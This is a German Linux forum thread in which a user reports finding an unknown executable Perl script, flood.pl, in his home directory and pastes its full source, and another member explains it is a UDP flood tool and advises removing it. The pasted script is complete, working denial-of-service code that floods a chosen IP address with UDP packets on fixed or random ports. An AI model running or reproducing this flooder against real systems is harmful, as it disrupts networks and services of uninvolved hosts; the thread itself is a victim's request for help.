Pro-Linux

Pro-Linux Diskussions- und Hilfeforum
Aktuelle Zeit: 12. Nov 2018 20:47

Alle Zeiten sind UTC+01:00




Ein neues Thema erstellen  Auf das Thema antworten  [ 4 Beiträge ] 
Autor Nachricht
BeitragVerfasst: 07. Mai 2007 9:34 
Offline

Registriert: 05. Jun 2004 15:55
Beiträge: 86
Hallo,

ich sichere meinen Rechner immer, wenn ich den Platz verlasse, sodass ich mich abmelden muss. Nun gibt es in meinem Homeverzeichnis eine Datei namens flood.pl und mit ausführbaren Rechten für 'world' und mit meiner Nutzer-ID und -Gruppe.

Kann mir einer erklären, was jemand davon hat, wenn er auf meinem Rechner dieses Scipt ausführt? Ich kann kein Perl.

[edit: ich habe das nicht da hin gepackt, das weiß ich genau, weil: ich kann kein Perl und habe auch nach keinem Script gesucht oder so]
Code:
#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit&#40;1&#41;;
&#125;

my &#40;$ip,$port,$size,$time&#41;;
$ip=$ARGV&#91;0&#93;;
$port=$ARGV&#91;1&#93;;
$time=$ARGV&#91;2&#93;;

socket&#40;crazy, PF_INET, SOCK_DGRAM, 17&#41;;
$iaddr = inet_aton&#40;"$ip"&#41;;

printf "udp flood - odix\n";

if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto randpackets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto randpackets;
&#125;

packets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;

randpackets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
$port=int&#40;rand 65000&#41; +1;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;
Ciao, micbur


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 07. Mai 2007 11:19 
Offline
Benutzeravatar

Registriert: 11. Feb 2006 19:10
Beiträge: 3569
Das was oben drin steht. UDP-Pakete an eine bestimmte IP, beginnend mit einem bestimmten Startport schicken. Bringt NFS, SMB (nicht CIFS), VPNs und einige andere Dienste durcheinander.

Deshalb wird in einem gut gewarteten Netzwerk den normalen Benutzern auch verboten, UDP-Pakete zu verschicken.

Janka

_________________
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 07. Mai 2007 12:08 
Offline

Registriert: 05. Jun 2004 15:55
Beiträge: 86
Also löschen.

Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Ciao, micbur


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 08. Mai 2007 10:38 
Offline
Benutzeravatar

Registriert: 11. Feb 2006 19:10
Beiträge: 3569
Zitat:
Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?
Kommt auf die Logeinstellungen deines Paketfilters an. Normalerweise werden ausgehende Pakete aber nicht geloggt, weil das das Logfile zumüllen würde.

Janka

_________________
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.


Nach oben
   
Beiträge der letzten Zeit anzeigen:  Sortiere nach  
Ein neues Thema erstellen  Auf das Thema antworten  [ 4 Beiträge ] 

Alle Zeiten sind UTC+01:00


Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 0 Gäste


Sie dürfen keine neuen Themen in diesem Forum erstellen.
Sie dürfen keine Antworten zu Themen in diesem Forum erstellen.
Sie dürfen Ihre Beiträge in diesem Forum nicht ändern.
Sie dürfen Ihre Beiträge in diesem Forum nicht löschen.
Sie dürfen keine Dateianhänge in diesem Forum erstellen.

Suche nach:
Gehe zu:  
Powered by phpBB® Forum Software © phpBB Limited
Deutsche Übersetzung durch phpBB.de